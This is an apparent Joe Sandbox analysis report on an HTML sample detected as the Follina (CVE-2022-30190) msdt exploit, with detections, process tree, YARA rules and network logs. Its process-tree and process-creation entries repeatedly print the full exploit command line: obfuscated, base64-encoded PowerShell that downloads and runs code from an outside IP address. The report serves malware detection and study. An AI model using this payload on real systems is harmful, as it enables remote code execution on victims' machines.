Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
exploit.htm

Overview

General Information

Sample Name:exploit.htm
Analysis ID:646603
MD5:7f4b47b5be4df743220dda8f5595909a
SHA1:5b7e7eea20de3f9c89d7ff3cf21e256d0ee00e54
SHA256:2cdd875b905065d9e35e323eb56f8f5b1dca141be94da35f79daf833d88728a7
Tags:Follinahtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 2508 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\exploit.htm MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 2856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • msdt.exe (PID: 1896 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
exploit.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
exploit.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.668056539.000001E93CA50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      0000000D.00000002.667981258.000001E93C9C4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: exploit.htmVirustotal: Detection: 48%Perma Link
        Source: exploit.htmReversingLabs: Detection: 34%

        Exploits

        barindex
        Yara detected Microsoft Office Exploit Follina CVE-2022-30190
        Source: Yara matchFile source: exploit.htm, type: SAMPLE
        Source: Yara matchFile source: 0000000D.00000002.668056539.000001E93CA50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.667981258.000001E93C9C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\2508_525662352\LICENSE.txtJump to behavior
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: unknownDNS traffic detected: queries for: clients2.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: Ruleset Data.0.drString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
        Source: Filtering Rules.0.dr, Ruleset Data.0.drString found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
        Source: Filtering Rules.0.drString found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)
        Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.drString found in binary or memory: http://llvm.org/):
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://accounts.google.com
        Source: craw_window.js.0.drString found in binary or memory: https://accounts.google.com/MergeSession
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://apis.google.com
        Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
        Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://clients2.google.com
        Source: manifest.json3.0.dr, manifest.json6.0.dr, manifest.json.0.drString found in binary or memory: https://clients2.google.com/service/update2/crx
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://clients2.googleusercontent.com
        Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
        Source: pnacl_public_x86_64_ld_nexe.0.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
        Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/.
        Source: LICENSE.txt.0.drString found in binary or memory: https://creativecommons.org/compatiblelicenses
        Source: 4a64c5b0-4134-42a3-ade2-28be8b61b6ac.tmp.1.dr, 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, 4209d767-871b-4a94-8545-161148c1f1df.tmp.1.dr, 49e038e6-1365-429c-94f4-db117dc07b92.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://dns.google
        Source: LICENSE.txt.0.drString found in binary or memory: https://easylist.to/)
        Source: 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://fonts.googleapis.com
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://fonts.gstatic.com
        Source: LICENSE.txt.0.drString found in binary or memory: https://github.com/easylist)
        Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://ogs.google.com
        Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://play.google.com
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.drString found in binary or memory: https://r4---sn-4g5ednz7.gvt1.com
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.drString found in binary or memory: https://redirector.gvt1.com
        Source: craw_window.js.0.dr, manifest.json.0.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://ssl.gstatic.com
        Source: craw_window.js.0.dr, craw_background.js.0.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://www.google.com
        Source: manifest.json.0.drString found in binary or memory: https://www.google.com/
        Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
        Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/cleardot.gif
        Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/dot2.gif
        Source: craw_window.js.0.drString found in binary or memory: https://www.google.com/images/x2.gif
        Source: craw_background.js.0.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
        Source: craw_window.js.0.dr, craw_background.js.0.dr, 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://www.googleapis.com
        Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/
        Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
        Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
        Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierra
        Source: manifest.json.0.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
        Source: 74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp.1.dr, aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp.1.dr, 04feef38-3821-409d-b560-1f5251bf45a3.tmp.1.drString found in binary or memory: https://www.gstatic.com
        Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: exploit.htm, type: SAMPLEMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: exploit.htmVirustotal: Detection: 48%
        Source: exploit.htmReversingLabs: Detection: 34%
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmpJump to behavior
        Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: classification engineClassification label: mal56.expl.winHTM@34/144@2/5
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\exploit.htm
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62AADA00-9CC.pmaJump to behavior
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\2508_525662352\LICENSE.txtJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22Jump to behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter        		Path Interception1
        Process Injection        		3
        Masquerading        		OS Credential Dumping1
        System Information Discovery        		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection        		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
        Non-Application Layer Protocol        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
        Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
        Ingress Tool Transfer        		SIM Card SwapCarrier Billing Fraud

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        exploit.htm48%VirustotalBrowse
        exploit.htm34%ReversingLabsDocument-HTML.Trojan.Phonzy

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://dns.google0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        accounts.google.com
        		172.217.168.45
        		truefalse
          		high
          clients.l.google.com
          		142.250.203.110
          		truefalse
            		high
            clients2.google.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
